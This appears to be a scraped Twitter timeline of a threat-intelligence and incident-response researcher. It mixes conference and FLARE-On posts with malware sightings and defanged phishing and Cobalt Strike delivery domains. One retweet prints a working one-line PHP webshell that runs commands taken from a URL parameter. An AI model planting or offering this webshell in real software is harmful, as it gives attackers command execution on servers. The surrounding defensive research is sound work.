RT @siedlmar: RooCon Call for Papers is open!.We are now accepting papers for RooCon 2023, Cyber Threat Intelligence and Attribution confer….

RT @JWilsonSecurity: Sometimes you just want to hunt 🔫.Three excellent technologies to investigate are. - VPN Clients. - Proxy Services….

RT @Int2e_: Don't know what an Azure Run Command is? Neither did I when we first stumbled on an attacker abusing this during a recent IR ca….

RT @Mandiant: Congrats to everyone who participated in #FLAREOn8! 👏. Check out our blog post for more on this year's contest & read the de….

RT @nickharbour: #flareon7 The hall of fame is now live! Congratulations everyone. Prizes will begin shipping in Mi….

RT @KarlScheuerman: Just recently realized that SANS Institute posted the presentation deck from the talk @dfir_it and I gave at the SANS….

RT @JaneScott: <❔Oneliner PHP Webshells!❔>. Shortest:.<?=`$_GET[1]`?>.*For even shorter, try dropping ?>. Pass cmd in url query string:.sit….

RT @KarlScheuerman: Didn't realize it was already posted but here is my and @dfir_it / Piotr's @MITREattack ATT&CKcon 2.0 talk from last mo….

RT @saleh_muhaysin: #DFIR Pleased to announce that we have published Kuiper a digital investigation platform. It is designed to aid investi….

Another fresh sample and another #OPSEC fail: One Google search away from determining the source organization 🤫

This simple SSH port forwarder has been around for a while. Even the embedded password has not been changed over the years. Samples:.(2017).(2019)

All challenges completed! Thanks @FireEye and the FLARE team for organizing #flareon6!

It looks like distribution of the #kingminer #malware was moved to GitHub: 24132.txt - 24164.txt - n.txt-

But wait, there's more!

Cutting edge cloud security breach notification technology

login-microsoftonline-com0authsecure353f.duckdns[.]org

* Tries to download fresh AV signatures from esetcdnserver[.]icu *. * Gets #cobaltstrike beacon *

When you skip OPSEC 101 and go straight to hacking ¯\_(ツ)_/¯